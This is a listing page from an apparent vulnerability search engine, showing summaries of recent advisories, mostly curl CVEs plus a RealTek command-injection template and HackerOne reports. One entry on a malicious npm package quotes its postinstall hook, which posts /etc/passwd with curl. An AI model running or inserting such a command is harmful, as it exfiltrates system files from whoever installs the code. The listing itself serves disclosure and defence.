CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

Positive Technologies•added 10 hours ago•4 views

PT-2026-48378

6AI score

OSSF Malicious Packages•added yesterday•3 views

Malicious code in @shell-landing/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577 On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

Nuclei•added yesterday•42 views

RealTek Jungle SDK - Arbitrary Command Injection

There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system. id: CVE-2021-35395 info: name: RealTek Jungle SDK - Arbitrary Command Injection...

10CVSS8.4AI score0.93663EPSS

Exploits2References5

Tenable Nessus•added yesterday•2 views

EulerOS 2.0 SP11 : curl (EulerOS-SA-2026-2238)

According to the versions of the curl packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : When an OAuth2 bearer token is used for an HTTPS transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the...

6.5CVSS7.4AI score0.00073EPSS

Exploits2References4

Tenable Nessus•added yesterday•3 views

EulerOS 2.0 SP11 : curl (EulerOS-SA-2026-2200)

6.5CVSS7.4AI score0.00073EPSS

Exploits2References4

Github Security Blog•added 2 days ago•6 views

nebula-mesh: GET /api/v1/audit-log discloses all entries to any operator

internal/api/audit.go:12 — handleGetAuditLog does no admin check. The route is bearer-auth gated only; any operator API key returns the full audit log via store.ListAuditEntries up to limit=1000. This includes cross-tenant actor names, host/CA/operator IDs, action timestamps, and masked-IP entrie...

Exploits0References4Affected Software1

Hacker One•added 4 days ago•7 views

curl: SOCKS5 no-auth accepted despite username/password-only authentication

Summary: curl/libcurl appears to allow unauthenticated SOCKS5 negotiation even when the caller explicitly configures username/password-only SOCKS5 authentication. With --socks5-basic and SOCKS5 credentials set, curl still advertises both SOCKS5 method 0x00 no authentication and 0x02...

Hacker One•added 4 days ago•10 views

Exploits0

curl: libcurl: HTTP/1.x bare LF byte in response header value enables cookie jar pollution and POST body/credential exfiltration via redirect — RC=0, curl 8

Summary curl's HTTP/1.x response header parser splits header lines using a single memchrbuf, '\n', blen call lib/http.c:4457, with no awareness of whether the current position is inside a quoted-string value. A server response containing any header field whose value embeds a raw LF byte \x0a caus...

Tenable Nessus•added 4 days ago•5 views

Exploits0

EulerOS Virtualization 2.12.1 : curl (EulerOS-SA-2026-2072)

According to the versions of the curl packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : libcurl can in some circumstances reuse the wrong connection when asked to do an Negotiate-authenticated HTTP or HTTPS request.libcur...

6.5CVSS5.6AI score0.00073EPSS

Exploits2References4

RedhatCVE•added 5 days ago•4 views

CVE-2026-7009

When curl is told to use the Certificate Status Request TLS extension, often referred to as OCSP stapling, to verify that the server certificate is valid, it fails to detect OCSP problems and instead wrongly consider the response as fine...

5.3CVSS5.4AI score0.00013EPSS

Exploits1References1

RedhatCVE•added 5 days ago•7 views

CVE-2026-42194

Admidio is an open-source user management solution. Prior to version 5.0.9, the incomplete SSRF fix in Admidio's fetchmetadata.php validates the resolved IP address but passes the original hostname-based URL to curlinit, leaving a DNS rebinding TOCTOU window that allows redirecting requests to...

6.8CVSS5.3AI score0.00037EPSS

RedhatCVE•added 5 days ago•6 views

CVE-2026-41688

Wallos is an open-source, self-hostable personal subscription tracker. In versions 4.8.4 and prior, the incomplete SSRF fix in Wallos validates webhook URLs via gethostbyname but passes the original hostname to cURL without CURLOPTRESOLVE pinning on 10 of 11 outbound HTTP endpoints, leaving a DNS...

7.7CVSS5.5AI score0.00036EPSS

RedhatCVE•added 5 days ago•5 views

CVE-2026-41064

WWBN AVideo is an open source video platform. In versions up to and including 29.0, an incomplete fix for AVideo's test.php adds escapeshellarg for wget but leaves the filegetcontents and curl code paths unsanitized, and the URL validation regex /^http/ accepts strings like httpevil.com. Commit...

9.3CVSS5.5AI score0.00071EPSS

Exploits1References1

CBLMariner•added 5 days ago•5 views

CVE-2026-7168 affecting package curl for versions less than 8.11.1-7

CVE-2026-7168 affecting package curl for versions less than 8.11.1-7. A patched version of the package is available...

5.3CVSS5.4AI score0.00104EPSS

CBLMariner•added 5 days ago•5 views

CVE-2026-6276 affecting package curl for versions less than 8.11.1-7

CVE-2026-6276 affecting package curl for versions less than 8.11.1-7. A patched version of the package is available...

7.5CVSS5.4AI score0.00013EPSS

CBLMariner•added 5 days ago•4 views

CVE-2026-4873 affecting package curl for versions less than 8.11.1-7

CVE-2026-4873 affecting package curl for versions less than 8.11.1-7. A patched version of the package is available...

5.9CVSS5.4AI score0.00014EPSS

Hacker One•added 5 days ago•11 views

curl: GnuTLS OCSP stapling accepts unrelated SingleResponse (no cert-ID binding)

Summary This report describes a variant of the publicly disclosed curl vulnerability CVE-2020-8286 OCSP stapling verification bypass, found in the GnuTLS TLS backend lib/vtls/gtls.c. The original CVE affected the NSS backend; this variant reproduces the same logical class of defect — accepting...

7.5CVSS6.8AI score0.00286EPSS